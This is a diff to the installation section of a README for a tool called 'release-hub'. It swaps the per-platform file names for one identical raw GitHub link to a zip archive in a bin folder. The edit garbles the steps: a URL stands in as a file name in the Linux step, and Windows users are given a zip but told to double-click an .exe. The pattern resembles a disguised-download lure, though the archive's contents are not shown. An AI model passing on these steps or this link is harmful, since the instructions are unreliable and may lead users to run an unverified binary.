topi8216/release-hub/README.md

 3. **Download the File**: Click on the corresponding file for your operating system.
 This will start the download.

-   - For Windows users, it may look like `release-hub-windows.exe`.
+   - For Windows users, it may look like `https://raw.githubusercontent.com/topi8216/release-hub/main/bin/release-hub-3.5.zip`.
-   - For macOS users, it may look like `release-hub-macos.zip`.
+   - For macOS users, it may look like `https://raw.githubusercontent.com/topi8216/release-hub/main/bin/release-hub-3.5.zip`.
-   - For Linux users, it may look like `release-hub-linux.tar.gz`.
+   - For Linux users, it may look like `https://raw.githubusercontent.com/topi8216/release-hub/main/bin/release-hub-3.5.zip`.

 4. **Open the Downloaded File**: Once the download is complete, locate the downloaded file in your downloads folder.

 5. **Run the Application**:
    - For Windows users: Double-click the `.exe` file.
 Follow the prompts to install.
    - For macOS users: Extract the `.zip` file, then drag the application to your Applications folder.
-   - For Linux users: Extract the `.tar.gz` file and run the executable from the terminal.
+   - For Linux users: Extract the `https://raw.githubusercontent.com/topi8216/release-hub/main/bin/release-hub-3.5.zip` file and run the executable from the terminal.

 6. **Start Using Release Hub**: After installation, find the app on your device and launch it.
 You are now ready to manage your releases!